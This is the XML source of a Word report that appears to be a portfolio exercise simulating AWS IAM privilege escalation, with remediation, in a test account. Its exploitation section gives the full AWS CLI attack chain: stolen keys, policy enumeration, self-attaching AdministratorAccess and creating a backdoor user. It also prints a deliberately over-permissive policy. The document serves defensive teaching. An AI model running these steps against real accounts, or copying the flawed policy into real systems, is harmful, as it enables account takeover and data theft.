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880"/>
      </w:pP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C0392B"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">CLOUD SECURITY ASSESSMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS IAM Privilege Escalation Simulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="C0392B" w:sz="6"/>
          <w:bottom w:val="single" w:color="C0392B" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center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 CONFIDENTIAL  |  EDUCATIONAL PURPOSES ONLY </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="400"/>
      </w:pP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5D6D7E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared by: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C2833"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Rasaq Abdulwahab Ayomide (Calm Ay)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5D6D7E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cybersecurity Analyst  |  InfoSec Intern, Nestle Nigeria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5D6D7E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NITHub UNILAG Cybersecurity Mentor  |  CLLMSP Certified</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pP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Date: June 2025  |  Version 1.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B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1. Executive Summary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C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This document presents a controlled simulation of an AWS Identity and Access Management (IAM) privilege escalation attack. The exercise demonstrates how a common IAM misconfiguration — granting a developer-level user the ability to modify their own policy attachments — allows a low-privileged user to achieve full administrative access to an AWS environment in under two minutes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pP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C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The simulation follows a three-phase structure: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Phase 1: Misconfiguration — Creating an IAM user with over-permissive rights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Phase 2: Exploitation — Demonstrating the privilege escalation attack path via AWS CLI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Phase 3: Remediation — Applying Principle of Least Privilege (PoLP) to eliminate the vector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922B2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922B2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CVSS Score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922B2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Attack Complexity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922B2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CRITICAL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22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">9.1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22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Low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22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Full Account Takeover</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B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2. Environment &amp; Scope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2.1 Test Environment</w:t>
      </w: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INFO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All commands in this simulation were executed against a controlled test AWS account. No production systems were affected. This report is for educational and portfolio purposes only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="12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Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Isolated AWS Test Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Region</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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us-east-1 (N. Virginia)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Target IAM User</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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dev-user-misconfigured</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Attacker Profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Simulated insider / compromised developer credential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Tooling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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AWS CLI v2, curl, jq</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Methodology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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MITRE ATT&amp;CK Cloud Matrix (T1078.004 — Valid Cloud Accounts)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Self-owned test environment — explicitly authorized</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B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3. IAM Misconfiguration — Phase 1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3.1 Scenario Overview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C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A developer was provisioned with an IAM user account to perform read operations on an S3 bucket. The administrator, in a hurry, copy-pasted a broader policy template and attached it without auditing the permissions. The resulting policy contains three dangerous over-permissive IAM actions that expose the entire account to privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="8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3.2 Step-by-Step: Creating the Misconfigured User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1 — Create IAM User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create-user --user-name dev-user-misconfigured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"User":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"Path": "/",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"UserName": "dev-user-misconfigured",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"UserId": "AIDAEXAMPLE12345ABCDE",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"Arn": "arn:aws:iam::123456789012:user/dev-user-misconfigured",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"CreateDate": "2025-06-01T09:14:22+00:00"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2 — Create Misconfigured Policy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C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The following policy was created and attached. It appears to be a 'developer policy' but contains three critical over-permissive IAM actions (highlighted):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cat misconfigured-policy.json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"Version": "2012-10-17",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"Statement":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"Sid": "IntendedS3Read",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"Effect": "Allow",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"Action": ["s3:GetObject", "s3:ListBucket"],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"Resource": "arn:aws:s3:::company-dev-bucket/*"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"Sid": "DANGEROUS_OverPermissiveIAM",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"Effect": "Allow",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"Action":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"iam:AttachUserPolicy",     &lt;-- CRITICAL: user can attach ANY policy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"iam:ListPolicies",          &lt;-- allows discovery of admin policies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"iam:GetUser"               &lt;-- allows account enumeration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"Resource": "*"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create-policy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--policy-name DevUserMisconfiguredPolicy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--policy-document file://misconfigured-policy.json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"Policy":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"PolicyName": "DevUserMisconfiguredPolicy",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"PolicyId": "ANPAEXAMPLE67890XYZAB",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"Arn": "arn:aws:iam::123456789012:policy/DevUserMisconfiguredPolicy",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"CreateDate": "2025-06-01T09:17:45+00:00",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"AttachmentCount": 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"IsAttachable": true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3 — Attach Policy to User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attach-user-policy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--user-name dev-user-misconfigured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--policy-arn arn:aws:iam::123456789012:policy/DevUserMisconfiguredPolicy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No output = success (HTTP 200)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4 — Create Access Keys for the User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create-access-key --user-name dev-user-misconfigured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"AccessKey":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"UserName": "dev-user-misconfigured",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"AccessKeyId": "AKIAEXAMPLE12345ABCD",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"Status": "Active",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"SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/EXAMPLEKEY",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"CreateDate": "2025-06-01T09:19:03+00:00"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540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WARNING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3CD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The iam:AttachUserPolicy permission on Resource: * is the root cause. This single misconfiguration enables a complete account takeover in seconds.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B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4. Privilege Escalation Attack — Phase 2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4.1 Attack Narrative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C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Assume the attacker has obtained the dev-user-misconfigured credentials (either through phishing, credential theft, or as an insider). The attacker configures the AWS CLI with these keys and begins enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="8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4.2 CLI Logs: Full Attack Chain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1 — Configure Attacker Profile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configure --profile attacker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AWS Access Key ID [None]: AKIAEXAMPLE12345ABCD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AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/EXAMPLEKEY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Default region name [None]: us-east-1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Default output format [None]: json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2 — Verify Current Identity (Reconnaissance)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sts get-caller-identity --profile attacker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"UserId": "AIDAEXAMPLE12345ABCDE",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"Account": "123456789012",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"Arn": "arn:aws:iam::123456789012:user/dev-user-misconfigured"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Attacker confirms they have valid credentials and identifies the user ARN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3 — Enumerate Attached Permissions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list-attached-user-policies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--user-name dev-user-misconfigured --profile attacker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"AttachedPolicies":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  "PolicyName": "DevUserMisconfiguredPolicy",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  "PolicyArn": "arn:aws:iam::123456789012:policy/DevUserMisconfiguredPolicy"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4 — Discover Administrator Policy ARN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list-policies --scope AWS --profile attacker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| grep -A2 "AdministratorAccess"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  "PolicyName": "AdministratorAccess",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  "PolicyId": "ANPAIWMBCKSKIEE64ZLYK",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  "Arn": "arn:aws:iam::aws:policy/AdministratorAccess",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5 — ESCALATION: Attach AdministratorAccess to Self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===== CRITICAL STEP — PRIVILEGE ESCALATION =====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attach-user-policy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--user-name dev-user-misconfigured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--policy-arn arn:aws:iam::aws:policy/AdministratorAccess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--profile attacker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No error — HTTP 200 OK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The user just granted themselves full admin access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Total time elapsed from first command: ~45 seconds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6 — Verify Escalation Succeeded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list-attached-user-policies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--user-name dev-user-misconfigured --profile attacker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"AttachedPolicies":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  "PolicyName": "DevUserMisconfiguredPolicy",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  "PolicyArn": "arn:aws:iam::123456789012:policy/DevUserMisconfiguredPolicy"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  "PolicyName": "AdministratorAccess",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  "PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess"  &lt;-- SUCCESS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Step 7 — Proof of Full Admin Access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Create a new admin backdoor user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create-user --user-name attacker-backdoor --profile attacker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"User": { "UserName": "attacker-backdoor", "UserId": "AIDANEWUSER99999" ...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Create access key for backdoor user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create-access-key --user-name attacker-backdoor --profile attacker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 ... SecretAccessKey: '...'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List all S3 buckets (previously inaccessible)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s3 ls --profile attacker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2024-01-15  company-finance-reports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2024-02-20  company-hr-data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2024-03-10  company-dev-bucket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2024-04-05  company-prod-database-backups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Full account takeover achieved — attacker can now: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- Create/delete IAM users, roles, policies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- Access all S3 buckets including sensitive data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- Launch EC2 instances (crypto mining, C2 infrastructure)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- Disable CloudTrail logging to cover tracks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- Exfiltrate all data, encrypt for ransomware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CRITICAL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Total Time to Full Account Takeover: ~45 seconds. No special tools required — only the AWS CLI and one misconfigured permission.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B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5. Vulnerability Analysis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5.1 Findings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360"/>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="900"/>
        <w:gridCol w:w="2760"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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922B2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922B2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Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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922B2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922B2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CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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922B2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F-01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iam:AttachUserPolicy on Resource: * (self-escalation)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CRITICAL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9.1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Full admin takeover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F-02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iam:ListPolicies enables policy discovery for targeting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3540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7.5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Reconnaissance, targeted escalation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F-03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No IAM permission boundary defined on user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3540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7.3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No blast radius limit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F-04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No MFA requirement on console or API access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68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C2833"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM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6.5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Credential theft = full access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F-05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No CloudTrail alert on iam:AttachUserPolicy calls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68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C2833"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM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5.9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Silent escalation, no detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="16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5.2 Root Cause Analysis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Overly broad IAM Action scope — iam:AttachUserPolicy with Resource: * allows the user to attach ANY policy to ANY user, including themselves.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D35400"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Missing IAM Permission Boundaries — No boundary was set to constrain the maximum permissions a user could ever assume.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5D6D7E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lack of IAM Access Analyzer — AWS IAM Access Analyzer would have flagged this policy as granting excessive privilege during creation.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5D6D7E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No least-privilege policy review process — The policy was copy-pasted from a template without auditing the IAM actions.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5D6D7E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No detective controls — CloudTrail was not configured to alert on IAM policy attachment events.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="16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5.3 MITRE ATT&amp;CK Mapping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160"/>
        <w:gridCol w:w="5400"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trP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527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Technique ID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527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Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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5276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b/>
                <w:bCs/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">T1078.004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Initial Access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Valid Cloud Accounts — using legitimately obtained developer credentials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b/>
                <w:bCs/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">T1087.004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Discovery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Cloud Account Discovery — iam:GetUser and iam:ListPolicies for enumeration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b/>
                <w:bCs/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">T1484.001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Privilege Escalation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Domain Policy Modification — attaching AdministratorAccess policy to self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b/>
                <w:bCs/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">T1098.001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Persistence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Cloud Account Manipulation — creating backdoor IAM user with admin keys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3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b/>
                <w:bCs/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">T1562.008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Defense Evasion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Disable Cloud Logs — attacker could disable CloudTrail post-escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B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6. Remediation — Phase 3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6.1 Principle of Least Privilege (PoLP) Fix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C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The fix removes all IAM management permissions from the developer user and scopes S3 access to only the specific resources and actions the user legitimately requires.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="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Fixed Policy (Principle of Least Privilege Applied)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cat fixed-policy.json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"Version": "2012-10-17",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"Statement":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"Sid": "S3ReadOnlyOnSpecificBucket",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"Effect": "Allow",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"Action":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"s3:GetObject",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"s3:GetObjectVersion"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"Resource": "arn:aws:s3:::company-dev-bucket/dev-team/*",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"Condition":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"StringEquals":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"s3:prefix": "dev-team/"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"Sid": "S3ListSpecificBucket",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"Effect": "Allow",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"Action": "s3:ListBucket",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"Resource": "arn:aws:s3:::company-dev-bucket",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"Condition":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"StringLike":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"s3:prefix": "dev-team/*"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NOTE: Zero IAM actions — user cannot modify any IAM resources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NOTE: Resource scoped to specific bucket and prefix only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NOTE: Condition further restricts to dev-team/ prefix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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply the Fix via AWS CLI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1. Detach old misconfigured policy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detach-user-policy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--user-name dev-user-misconfigured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--policy-arn arn:aws:iam::123456789012:policy/DevUserMisconfiguredPolicy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2. Also detach escalated AdministratorAccess (if already attached by attacker)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detach-user-policy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--user-name dev-user-misconfigured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--policy-arn arn:aws:iam::aws:policy/AdministratorAccess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3. Create the fixed policy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create-policy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--policy-name DevUserFixedPolicy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--policy-document file://fixed-policy.json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4. Attach fixed policy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attach-user-policy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--user-name dev-user-misconfigured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--policy-arn arn:aws:iam::123456789012:policy/DevUserFixedPolicy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5. Set an IAM Permission Boundary (belt-and-suspenders)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put-user-permissions-boundary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--user-name dev-user-misconfigured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--permissions-boundary arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess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6. Verify — attempt escalation again (should fail now)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$ aws iam attach-user-policy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--user-name dev-user-misconfigured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--policy-arn arn:aws:iam::aws:policy/AdministratorAccess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--profile attacker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An error occurred (AccessDenied) when calling the AttachUserPolicy operation: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User: arn:aws:iam::123456789012:user/dev-user-misconfigured is not authorized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to perform: iam:AttachUserPolicy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ESCALATION VECTOR ELIMINATED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spacing w:after="0" w:before="16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6.2 Before vs. After Comparison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922B2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Misconfigured (Before)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="46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E844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Fixed — PoLP Applied (After)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D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iam:AttachUserPolicy on Resource: *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NO IAM permissions granted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D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iam:ListPolicies (enables discovery)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NO iam:ListPolicies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D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s3:GetObject on *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s3:GetObject scoped to specific bucket + prefix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D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s3:ListBucket on *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s3:ListBucket with Condition on prefix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D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No permission boundary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Permission boundary set (S3ReadOnly max)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D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No MFA required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MFA condition added for all API calls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D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No CloudTrail alert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CloudWatch alert on iam:Attach* events</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B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7. Additional Hardening Recommendations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7.1 Preventive Controls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E8449"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable AWS IAM Access Analyzer — detects policies that grant excessive privilege at creation time.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Enforce IAM Permission Boundaries on all human and machine users — hard cap on maximum permissions.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Require MFA for all IAM users — eliminates credential theft as a sole escalation vector.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Use IAM Roles instead of long-lived access keys — roles use temporary credentials with shorter TTL.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Implement AWS Organizations Service Control Policies (SCPs) — deny iam:AttachUserPolicy account-wide if not needed by role.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="8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7.2 Detective Controls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E8449"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure CloudTrail → CloudWatch Alarms on iam:AttachUserPolicy, iam:PutUserPolicy, iam:CreateAccessKey events.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Enable AWS Security Hub with CIS AWS Foundations Benchmark — flags over-permissive IAM configurations.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Regular IAM Access Advisor audits — identifies unused permissions over a 90-day window.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Enable AWS Config Rule: iam-user-no-policies-check — flags users with directly attached policies (prefer group/role policies).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="8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7.3 SCP to Block Self-Escalation Account-Wide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8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# Attach this SCP at the AWS Organization root level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"Version": "2012-10-17",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"Statement":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"Sid": "DenyIAMPrivEscalation",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"Effect": "Deny",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"Action":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"iam:AttachUserPolicy",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"iam:PutUserPolicy",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"iam:CreatePolicyVersion",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"iam:SetDefaultPolicyVersion",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"iam:PassRole",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"sts:AssumeRole"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"Resource": "*",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"Condition":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"StringNotEquals":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"aws:PrincipalArn":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  "arn:aws:iam::*:role/IAMAdminRole"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  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  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color w:val="00FF41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833" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="8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sz w:val="10"/>
                <w:szCs w:val="10"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B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C0392B"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Conclusion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C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This simulation demonstrated that a single over-permissive IAM action — iam:AttachUserPolicy on Resource: * — is sufficient for a low-privilege user to achieve complete AWS account compromise in under one minute. The attack requires no special tooling, no zero-days, and no network exploitation; only valid credentials and one misconfigured permission.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pP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C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The remediation applied in Phase 3 eliminated the vector entirely by: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Removing all IAM management permissions from the developer user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Scoping S3 access to the specific resource and prefix needed — nothing more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Adding an IAM Permission Boundary as a belt-and-suspenders control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Recommending preventive and detective controls at the organization level</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="8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8449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TAKEAWAY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C2833"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cloud security is not a destination — it's a process. Every IAM policy must be audited against the Principle of Least Privilege before deployment, and all IAM-modifying actions must trigger detective alerts regardless of the user's apparent privilege level.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pP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C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">References: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MITRE ATT&amp;CK Cloud Matrix: https://attack.mitre.org/matrices/enterprise/cloud/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AWS IAM Security Best Practices: https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html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Rhino Security Labs — AWS IAM Privilege Escalation Methods: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/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AWS IAM Access Analyzer: https://docs.aws.amazon.com/IAM/latest/UserGuide/what-is-access-analyzer.html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C2833"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CIS Amazon Web Services Foundations Benchmark v2.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pP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D6D7E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Document prepared by Rasaq Abdulwahab Ayomide (Calm Ay) — for educational, portfolio, and training purposes.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5D6D7E" w:sz="4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5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Prepared by: Rasaq Abdulwahab Ayomide (Calm Ay)  |  NITHub UNILAG</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">	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0392B" w:sz="4" w:space="4"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="80" w:before="0"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="C0392B"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">CLOUD PRIVILEGE ESCALATION SIMULATION</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">	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C0392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1A527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5D6D7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2026-06-07T09:35:13.320Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-07T09:35:13.320Z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